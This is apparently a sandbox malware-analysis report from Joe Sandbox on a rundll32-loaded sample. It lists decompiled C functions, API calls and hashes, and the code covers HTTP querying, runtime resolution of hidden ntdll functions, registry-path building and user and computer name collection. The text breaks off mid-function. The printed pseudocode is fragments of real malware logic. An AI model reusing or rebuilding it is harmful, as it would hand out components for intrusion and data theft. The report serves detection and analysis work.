0x045e4eef
0x00000000
0x045e4edb
0x045e4eb0
0x045e4e74
0x045e4e7a
0x045e4e7d
0x045e4e82
0x00000000
0x00000000
0x00000000
0x045e4f12
0x045e4f1a
0x045e4f1f
0x045e4f22
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 045E4E64
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,045E3897,00000000,?), ref: 045E4E74
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 045E4EA6
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 045E4ECB
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 045E4EEB
GetLastError.KERNEL32 ref: 045E4EFD

Part of subcall function 045E2129: WaitForMultipleObjects.KERNEL32(00000002,045E7C1D,00000000,045E7C1D,?,?,?,045E7C1D,0000EA60), ref: 045E2144

Part of subcall function 045E789E: RtlFreeHeap.NTDLL(00000000,00000000,045E4E3E,00000000,?,00000000,00000000), ref: 045E78AA

GetLastError.KERNEL32(00000000), ref: 045E4F32

Strings

@MqtNqt, xrefs: 045E4EFD, 045E4F32

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID: @MqtNqt
API String ID: 3369646462-2883916605
Opcode ID: 66495dfbc52c21164351f8b6124e6954a888f774c19f5713f5f70f3c6d8485f8
Instruction ID: 7b8dea09e4c39fcedc1fb114164ebaf20a43323009dd8d15e593f9b3a0c1c5ca
Opcode Fuzzy Hash: 66495dfbc52c21164351f8b6124e6954a888f774c19f5713f5f70f3c6d8485f8
Instruction Fuzzy Hash: 003123B5900309EFDF24DFE6D8849AEB7B8FB09704F1049A9E512A3240D730BA44EF10

Uniqueness

Uniqueness Score: -1.00%

Function 045E41C5 Relevance: 13.6, APIs: 9, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E045E41C5(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x45ea3dc; // 0x4ff9c68
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E045E540A();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E045E540A();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E045E2C2A(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E045E2C2A(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E045E5C2F(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x45e918c;
						}
						_t70 = E045E224E(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E045E7A71(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x45ea348; // 0xa0d5a8
								_t102 =  *0x45ea138; // 0x45e7db3
								_t28 = _t105 + 0x45ebb08; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E045E5C2F(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x45e9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E045E7A71(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E045E789E(_v24);
								} else {
									_t92 =  *0x45ea348; // 0xa0d5a8
									_t44 = _t92 + 0x45ebc80; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E045E789E(_v8);
						}
						E045E789E(_v12);
					}
					E045E789E(_v16);
				}
				return _v28;
			}

0x045e41cb
0x045e41d3
0x045e41d6
0x045e41e3
0x045e41e6
0x045e41ed
0x045e41f4
0x045e41f7
0x045e4204
0x045e4207
0x045e420a
0x045e420f
0x045e4214
0x045e421c
0x045e4221
0x045e4226
0x045e422c
0x045e4230
0x045e4239
0x045e423d
0x045e423f
0x045e423f
0x045e4247
0x045e424c
0x045e4251
0x045e4257
0x045e425e
0x045e426f
0x045e4276
0x045e4288
0x045e428d
0x045e4292
0x045e429b
0x045e42a4
0x045e42ad
0x045e42c3
0x045e42c8
0x045e42cc
0x045e42d0
0x045e42d5
0x045e42da
0x045e42dc
0x045e42dc
0x045e42e6
0x045e42ef
0x045e42f6
0x045e4312
0x045e4316
0x045e434f
0x045e4318
0x045e431b
0x045e4323
0x045e4334
0x045e433c
0x045e4344
0x045e4348
0x045e4348
0x045e4316
0x045e4357
0x045e4357
0x045e435f
0x045e435f
0x045e4367
0x045e4367
0x045e4373

APIs

GetTickCount.KERNEL32 ref: 045E41DD
lstrlen.KERNEL32(00000000,00000005), ref: 045E425E
lstrlen.KERNEL32(?), ref: 045E426F
lstrlen.KERNEL32(00000000), ref: 045E4276
lstrlenW.KERNEL32(80000002), ref: 045E427D
lstrlen.KERNEL32(?,00000004), ref: 045E42E6
lstrlen.KERNEL32(?), ref: 045E42EF
lstrlen.KERNEL32(?), ref: 045E42F6
lstrlenW.KERNEL32(?), ref: 045E42FD

Part of subcall function 045E789E: RtlFreeHeap.NTDLL(00000000,00000000,045E4E3E,00000000,?,00000000,00000000), ref: 045E78AA

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: e10b05e8f41e5547200332af2531fafe0cc05c25ddd1355c2961e2289d6b2f0d
Instruction ID: ba1402d561ed6a249f587fe414ef19c9c5ea8b5f7f1e1088f5c9a764c40ed822
Opcode Fuzzy Hash: e10b05e8f41e5547200332af2531fafe0cc05c25ddd1355c2961e2289d6b2f0d
Instruction Fuzzy Hash: 63519572D0021AABDF19AFA6DC449EE7BB5FF48314F158064E904A7210DB35DE15EB50

Uniqueness

Uniqueness Score: -1.00%

Function 045E2AA6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E2AA6(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E045E7A71(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x45ea348; // 0xa0d5a8
					_t1 = _t23 + 0x45eb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x45ea348; // 0xa0d5a8
					_t2 = _t26 + 0x45eb761; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E045E789E(_t54);
					} else {
						_t30 =  *0x45ea348; // 0xa0d5a8
						_t5 = _t30 + 0x45eb74e; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x45ea348; // 0xa0d5a8
							_t7 = _t33 + 0x45eb771; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x45ea348; // 0xa0d5a8
								_t9 = _t36 + 0x45eb4ca; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x45ea348; // 0xa0d5a8
									_t11 = _t39 + 0x45eb786; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E045E2156(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x045e2ab5
0x045e2ab9
0x045e2b7b
0x045e2abf
0x045e2abf
0x045e2ac4
0x045e2ad7
0x045e2ad9
0x045e2ade
0x045e2ae6
0x045e2aed
0x045e2aef
0x045e2af4
0x045e2b73
0x045e2b74
0x045e2af6
0x045e2af6
0x045e2afb
0x045e2b03
0x045e2b05
0x045e2b0a
0x00000000
0x045e2b0c
0x045e2b0c
0x045e2b11
0x045e2b19
0x045e2b1b
0x045e2b20
0x00000000
0x045e2b22
0x045e2b22
0x045e2b27
0x045e2b2f
0x045e2b31
0x045e2b36
0x00000000
0x045e2b38
0x045e2b38
0x045e2b3d
0x045e2b45
0x045e2b47
0x045e2b4c
0x00000000
0x045e2b4e
0x045e2b54
0x045e2b59
0x045e2b60
0x045e2b65
0x045e2b6a
0x00000000
0x045e2b6c
0x045e2b6f
0x045e2b6f
0x045e2b6a
0x045e2b4c
0x045e2b36
0x045e2b20
0x045e2b0a
0x045e2af4
0x045e2b89

APIs

Part of subcall function 045E7A71: RtlAllocateHeap.NTDLL(00000000,00000000,045E4DB1), ref: 045E7A7D

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,045E3C0C,?,?,?,?,00000000,00000000), ref: 045E2ACB
GetProcAddress.KERNEL32(00000000,7243775A), ref: 045E2AED
GetProcAddress.KERNEL32(00000000,614D775A), ref: 045E2B03
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 045E2B19
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 045E2B2F
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 045E2B45

Part of subcall function 045E2156: memset.NTDLL ref: 045E21D5

Strings

Nqt, xrefs: 045E2AD1

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID: Nqt
API String ID: 1886625739-806837294
Opcode ID: d8398f0b86fd85a19f584227a9297c951304b145c7322084303627eac683b236
Instruction ID: 4914d0862e7fc888eac3aff4c11716ba22933a9078fd2da9e84f3e6607ee42be
Opcode Fuzzy Hash: d8398f0b86fd85a19f584227a9297c951304b145c7322084303627eac683b236
Instruction Fuzzy Hash: 7E2139B150070AAFD718DF6BD884E6AB7ECFB58345B0045A5E505CB620E674FD08ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 045E2D54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E2D54(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x45ea30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x45ea2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x45ea2f8 = _t6;
					 *0x45ea304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x45ea2f4 = _t7;
					if(_t7 == 0) {
						 *0x45ea2f4 =  *0x45ea2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x045e2d5c
0x045e2d62
0x045e2d69
0x00000000
0x045e2dc3
0x045e2d6b
0x045e2d73
0x045e2d80
0x045e2d80
0x045e2dc0
0x00000000
0x045e2dc0
0x045e2d82
0x045e2d82
0x045e2d87
0x045e2d99
0x045e2d9e
0x045e2da4
0x045e2daa
0x045e2db1
0x045e2db3
0x045e2db3
0x00000000
0x045e2dba
0x045e2d7c
0x00000000
0x00000000
0x045e2d7e
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,045E72F1,?), ref: 045E2D5C
GetVersion.KERNEL32 ref: 045E2D6B
GetCurrentProcessId.KERNEL32 ref: 045E2D87
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 045E2DA4
GetLastError.KERNEL32 ref: 045E2DC3

Strings

@MqtNqt, xrefs: 045E2DC3

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID: @MqtNqt
API String ID: 2270775618-2883916605
Opcode ID: 502d20a517689725fe50513c781b13f3e7e4a12656ec3265479f3984889bcaf9
Instruction ID: c35a7e7881936cf37bd02f21e0c250b8ac04fa58cf3dc43d20e1702d84499858
Opcode Fuzzy Hash: 502d20a517689725fe50513c781b13f3e7e4a12656ec3265479f3984889bcaf9
Instruction Fuzzy Hash: 16F081B4640302ABD72C8F33AA19B683B66F704711F400454F616EE1C8E678DC4AFB15

Uniqueness

Uniqueness Score: -1.00%

Function 045E5E6F Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 045E5EC9
SysAllocString.OLEAUT32(0070006F), ref: 045E5EDD
SysAllocString.OLEAUT32(00000000), ref: 045E5EEF
SysFreeString.OLEAUT32(00000000), ref: 045E5F57
SysFreeString.OLEAUT32(00000000), ref: 045E5F66
SysFreeString.OLEAUT32(00000000), ref: 045E5F71

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 8dcd28e802f05f7d2875e0832109fb08bd889176e8f2395da9bbe8349a8dcfdf
Instruction ID: 4ff82ad5ed8b7b225b5c9e3df175e61e14ecf17e6e00cd27779ff78db91054bd
Opcode Fuzzy Hash: 8dcd28e802f05f7d2875e0832109fb08bd889176e8f2395da9bbe8349a8dcfdf
Instruction Fuzzy Hash: B8416072900609AFDB05DFF9D844AAFB7B9FF89304F144465E910EB210EA71AE05DB91

Uniqueness

Uniqueness Score: -1.00%

Function 045E2331 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E045E2331(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x45ea3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E045E3D2E( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E045E2087(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E045E789E(_a8);
						goto L29;
					}
					_t64 =  *0x45ea318; // 0x4ff9dc0
					_t16 = _t64 + 0xc; // 0x4ff9ee2
					_t65 = E045E3D2E(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d045e90
						if(E045E6BEB(_t97,  *_t33, _t91, _a8,  *0x45ea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x45ea348; // 0xa0d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x45eba3e; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x45eba39; // 0x55434b48
								_t69 = _t34;
							}
							if(E045E41C5(_t69,  *0x45ea3d4,  *0x45ea3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x45ea348; // 0xa0d5a8
									_t44 = _t71 + 0x45eb842; // 0x74666f53
									_t73 = E045E3D2E(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d045e90
										E045E187F( *_t47, _t91, _a8,  *0x45ea3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d045e90
										E045E187F( *_t49, _t91, _t99,  *0x45ea3d0, _a16);
										E045E789E(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d045e90
									E045E187F( *_t40, _t91, _a8,  *0x45ea3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d045e90
									E045E187F( *_t43, _t91, _a8,  *0x45ea3d0, _a16);
								}
								if( *_t101 != 0) {
									E045E789E(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d045e90
					_t81 = E045E78B3( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d045e90
							E045E6BEB(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E045E789E(_t100);
						_t98 = _a16;
					}
					E045E789E(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E045E7A86(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x45ea3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x045e2331
0x045e233a
0x045e2341
0x045e2346
0x045e23b3
0x045e23b9
0x045e23be
0x045e23c5
0x045e23ca
0x045e23cf
0x045e253a
0x045e2541
0x045e2541
0x045e2546
0x045e2548
0x045e2548
0x045e2551
0x045e2551
0x045e23d5
0x045e23e1
0x045e2530
0x045e2533
0x00000000
0x045e2533
0x045e23e7
0x045e23ec
0x045e23ef
0x045e23f4
0x045e23f9
0x045e2442
0x045e2442
0x045e2455
0x045e245f
0x045e2465
0x045e246c
0x045e2476
0x045e2476
0x045e246e
0x045e246e
0x045e246e
0x045e246e
0x045e2498
0x045e24a0
0x045e24ce
0x045e24d3
0x045e24da
0x045e24df
0x045e24e3
0x045e2515
0x045e24e5
0x045e24f2
0x045e24f5
0x045e2505
0x045e2508
0x045e250e
0x045e250e
0x045e24a2
0x045e24af
0x045e24b2
0x045e24c4
0x045e24c7
0x045e24c7
0x045e251f
0x045e252b
0x045e2521
0x045e2524
0x045e2524
0x045e251f
0x045e2498
0x00000000
0x045e245f
0x045e2408
0x045e240b
0x045e2412
0x045e2418
0x045e241b
0x045e241d
0x045e2429
0x045e242c
0x045e242c
0x045e2432
0x045e2437
0x045e2437
0x045e243d
0x00000000
0x045e243d
0x045e234b
0x00000000
0x045e2372
0x045e2372
0x045e237e
0x045e2391
0x045e2397
0x045e239f
0x00000000
0x045e239f

APIs

StrChrA.SHLWAPI(045E68B1,0000005F,00000000,00000000,00000104), ref: 045E2364
lstrcpy.KERNEL32(?,?), ref: 045E2391

Part of subcall function 045E3D2E: lstrlen.KERNEL32(?,00000000,04FF9DC0,00000000,045E695F,04FF9FE3,69B25F44,?,?,?,?,69B25F44,00000005,045EA00C,4D283A53,?), ref: 045E3D35
Part of subcall function 045E3D2E: mbstowcs.NTDLL ref: 045E3D5E
Part of subcall function 045E3D2E: memset.NTDLL ref: 045E3D70

Part of subcall function 045E187F: lstrlenW.KERNEL32(?,?,?,045E24FA,3D045E90,80000002,045E68B1,045E1629,74666F53,4D4C4B48,045E1629,?,3D045E90,80000002,045E68B1,?), ref: 045E18A4

Part of subcall function 045E789E: RtlFreeHeap.NTDLL(00000000,00000000,045E4E3E,00000000,?,00000000,00000000), ref: 045E78AA

lstrcpy.KERNEL32(?,00000000), ref: 045E23B3

Strings

\, xrefs: 045E2397
(, xrefs: 045E2414

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: e8091e2c492c3faed574c0733cec829b62fedca7369f1451a886337666241071
Instruction ID: af9a3efb29a36ccfebc59e123ba69dad18f048e282f81979e9beca9ff8cb0aa2
Opcode Fuzzy Hash: e8091e2c492c3faed574c0733cec829b62fedca7369f1451a886337666241071
Instruction Fuzzy Hash: A551387210020AEFEF299FA2ED40EAA7BBEFB48344F008555F9159A124E735ED15FB10

Uniqueness

Uniqueness Score: -1.00%

Function 045E731D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E045E731D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x45ea3cc; // 0x4ff9600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x45ea3cc; // 0x4ff9600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x45ea3cc; // 0x4ff9600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x45eb827) {
					HeapFree( *0x45ea2d8, 0, _t10);
					_t7 =  *0x45ea3cc; // 0x4ff9600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x045e731d
0x045e7326
0x045e7336
0x045e7336
0x045e733b
0x045e7340
0x00000000
0x00000000
0x045e7330
0x045e7330
0x045e7342
0x045e7347
0x045e734b
0x045e735e
0x045e7364
0x045e7364
0x045e736d
0x045e736f
0x045e7373
0x045e7379

APIs

RtlEnterCriticalSection.NTDLL(04FF95C0), ref: 045E7326
Sleep.KERNEL32(0000000A), ref: 045E7330
HeapFree.KERNEL32(00000000), ref: 045E735E
RtlLeaveCriticalSection.NTDLL(04FF95C0), ref: 045E7373

Strings

Uqt, xrefs: 045E735E

Memory Dump Source

Source File: 00000005.00000002.817270841.00000000045E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 045E0000, based on PE: true

Associated: 00000005.00000002.817255326.00000000045E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817297629.00000000045E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817312621.00000000045EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000005.00000002.817323736.00000000045EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_45e0000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uqt
API String ID: 58946197-2320327147
Opcode ID: 0de0850234867dd5a15bd662ec6c5552affde871f3235dc9ffed6aa1ca008c5d
Instruction ID: b26b4dc338098a130c65f49e2a7549fa51ed8fcfd8583a2fe9b0942727c8c421
Opcode Fuzzy Hash: 0de0850234867dd5a15bd662ec6c5552affde871f3235dc9ffed6aa1ca008c5d
Instruction Fuzzy Hash: F5F0DAB4200202DFE76CCF67E859A6977B5FB4C301B145019E902DB390C738BC08FA25

Uniqueness

Uniqueness Score: -1.00%

Function 045E3ACA Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E045E3ACA() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x775ec742
						_v12 = _v12 + _t11;
						_t64 = E045E7A71(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E045E789E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
